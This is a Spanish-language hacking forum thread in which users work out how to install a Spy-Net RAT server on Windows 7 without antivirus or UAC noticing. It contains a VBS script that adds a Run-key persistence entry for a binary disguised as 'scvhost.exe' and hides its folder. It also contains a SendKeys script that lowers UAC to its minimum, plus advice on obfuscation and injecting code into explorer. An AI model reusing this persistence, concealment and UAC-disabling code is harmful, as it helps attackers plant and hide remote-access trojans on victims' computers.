Indetectar script VBS a UAC win 7

UnknoW · Marzo 20, 2011, 06:09:58 AM

Saludos a todos, tengo un problema, se trata de un script en VBs que uso para añadir al regitro el server de spy net, de este modo consigo saltarme la preactiva de algunos AV (como el AVG 2011) pero aunque me la salte, me salta la uac del win 7 notificando del intento de añadirse al regitro, mostrnado el nombre y el proceso del server y pidiendo permiso o si deseo cancelarlo =(, hay algun modo de conseguir que la uac no salte?

aqui os dejo el codigo que he usado, que no es de mi autoria :

Código: php

set indetectable = createobject("wscript.shell")
indetectable.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\PRUEBA" , "%APPDATA%\PRUEBA\scvhost.exe" , "REG_EXPAND_SZ"
indetectable.Run "attrib +r +s +h %APPDATA%\PRUEBA" , VbHide
indetectable.Run "attrib +r +s +h %APPDATA%\PRUEBA\*.*" , VbHide

espero que me podais ayudar, espero vuestras respuestas

Saludos y gracias!

taliban1707 · Marzo 20, 2011, 06:09:09 PM

Esto no da respuesta a tu pregunta completamente pero es para que te des una idea de como puedes hacerlo

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

UnknoW · Marzo 21, 2011, 02:55:04 PM

Gracias me ha servido un poco para orientarme, pero tambien estuve hablando con ANTRAX sobre el tema y me dijo que tenia que osfuncar el script y con eso lo tendria listo, alguien domina ese tema ?

Juan · Marzo 23, 2011, 04:08:37 PM

Ofuscarlo seria para saltar los Avs cuando escanean pero para esto no sirve ya que lo que detecta es la accion de añadirse al registro...
Nose si se podrá hacer esto en VBS sin que lo detecte la seguridad de windows, en otros lenguajes podrías intentar inyectar código en un proceso con derechos como explorer y etc. Tambien puedes provar a desactivar la UAC

.

salu2!

EDITO:

Ahi te va un código que encontre por la red para desactivarlo:

Código: php

'// 1337H4x Written by _____________ 
'//                    (12 year old)

Set WshShell = WScript.CreateObject("WScript.Shell")

'// Toggle Start menu
WshShell.SendKeys("^{ESC}")
WScript.Sleep(500)

'// Search for UAC applet
WshShell.SendKeys("change uac")
WScript.Sleep(2000)

'// Open the applet (assuming second result)
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{ENTER}")
WScript.Sleep(2000)

'// Set UAC level to lowest (assuming out-of-box Default setting)
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")

'// Save our changes
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{ENTER}")

'// TODO: Add code to handle installation of rebound
'// process to continue exploitation, i.e. place something
'// evil in Startup folder

'// Reboot the system
'// WshShell.Run "shutdown /r /f"

Link de la web:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

UnknoW · Marzo 24, 2011, 11:43:59 AM

Gracias Drinky94 =D, acabo de probarlo en vbs, pero no desactiva la uac, se ve que hay un fallo en la secuencia de acciones que ordena el script

Ignaro mayor de BsAs · Marzo 28, 2011, 07:54:48 PM

Me hicieron acordar del maldito avg. Lo que acaban de citar, (es bueno poner la fuente) es de Geminis.
Entre todos tenemos que burlar esa maldita proactiva del maldito Avg.
De la noche a la mañana se ha puesto serio.

Indetectar script VBS a UAC win 7

UnknoW

Marzo 20, 2011, 06:09:58 AM Ultima modificación: Mayo 09, 2017, 11:27:42 AM por xyz

taliban1707

Marzo 20, 2011, 06:09:09 PM #1 Ultima modificación: Mayo 09, 2017, 11:27:23 AM por xyz

UnknoW

Marzo 21, 2011, 02:55:04 PM #2

Juan

Marzo 23, 2011, 04:08:37 PM #3 Ultima modificación: Marzo 23, 2011, 04:16:52 PM por Drinky94

UnknoW

Marzo 24, 2011, 11:43:59 AM #4 Ultima modificación: Marzo 24, 2011, 01:33:55 PM por UnknoW

Ignaro mayor de BsAs

Marzo 28, 2011, 07:54:48 PM #5